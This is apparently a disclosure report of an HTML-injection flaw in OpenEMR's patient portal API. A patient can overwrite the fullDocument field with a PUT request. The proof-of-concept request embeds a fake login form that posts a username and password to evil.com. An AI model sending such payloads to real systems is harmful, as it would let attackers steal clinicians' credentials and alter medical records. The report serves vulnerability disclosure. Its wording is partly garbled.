It looks like through the PUT request, a Patient can rewrite it’s own document via the fullDocument
JSON parameter. In this way a malicious user patient can’t override the document form and rewrite his own, also injecting valid HTML code that the Doctor would be able to see.
PUT
request on /openemr/portal/patient/api/onsitedocument/<ID>
endpoint.fullDocument
JSON param, that value can be changed.PUT /openemr/portal/patient/api/onsitedocument/7 HTTP/1.1
Host: demo.openemr.io
{"id":"2","pid":"1","facility":"0","provider":"0","encounter":"0","createDate":"2022-12-26 04:18:41","docType":"Insurance Info","patientSignedStatus":"0","patientSignedTime":"0000-00-00 00:00:00","authorizeSignedTime":"0000-00-00 00:00:00","acceptSignedStatus":"0","authorizingSignator":"","reviewDate":"0000-00-00 00:00:00","denialReason":"In review","authorizedSignature":"","patientSignature":"","fullDocument":"<h3>please provide your username and password:</h3><br><form method='post' action='//evil.com/login.php'>username:<input type='text' name='username' /><br />password: <input type='password' name='password'><br /><input type='submit' value='login' /></form><br /><a href="//evil.com">click here</a>